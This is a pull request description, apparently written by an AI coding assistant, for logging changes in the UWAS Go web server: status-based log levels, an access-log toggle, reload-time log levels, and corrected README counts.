Of **121 Info calls** in the tree, exactly **one** sits in a request path — the access-log middleware. The other 120 are state changes: `starting UWAS`, `listening`, `config reloaded`, `PHP assigned to domain`, `backup scheduler started`.

So the Info messages are the operationally useful ones. The flood is telemetry going through the logger.

### 1. A request line takes its level from the status

| status | level |
|---|---|
| 5xx | `Error` |
| everything else | `Info` |

Every request used to be Info, so lowering `global.log_level` to quieten the stream **also hid the failures** — the one part worth keeping.

4xx deliberately stays at info: scanner 404s are constant on a public site and would put the noise straight back into warn. Blocked requests are already reported at warn by the security and WAF guards.

### 2. `global.access_log.enabled`

Turns the stream off entirely, for a deployment that already writes per-domain `access_log` files and does not want the same data twice. `Enabled` is a pointer so an absent block keeps the request log on — what has always happened.

### 3. `global.log_level` applies on reload

The level lives in a `slog.LevelVar` precisely so it can move, and nothing called into it. A reload accepted a new value, wrote it to the config, showed it in the panel — and kept logging at the old threshold until the process restarted, which is the moment an operator least wants to restart.

### Docs

The README snapshot said v0.8.9 and the counts had drifted: 42 dashboard pages (**43**), 251 admin routes (**253**), 55 Go packages (**69**), 54 test packages (**56**), 5 load balancer algorithms (**6**).

It also claimed *"Legacy domain-keyed `type=app` config and migration endpoints are removed"* — **they are not.** The type still loads and answers 502, which is what it now says. `global.access_log`, `proxy.grpc` and the status-derived level are documented in SPECIFICATION.

### Sharpness

Reverting each of the three fails its own test:

```
level after reload = INFO, want warn — the new value did not reach the logger
a 500 was silenced at warn — the failures are what warn is for
status 200 logged with the access log disabled
```

Includes #89 (crontab deadline), without which `internal/admin` cannot finish locally. Verified before pushing: `gofmt`, `go vet`, `staticcheck`, `go test ./...` — 56 packages, 0 failures.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01SeKCMz2Rsk5xySrCPBLK2G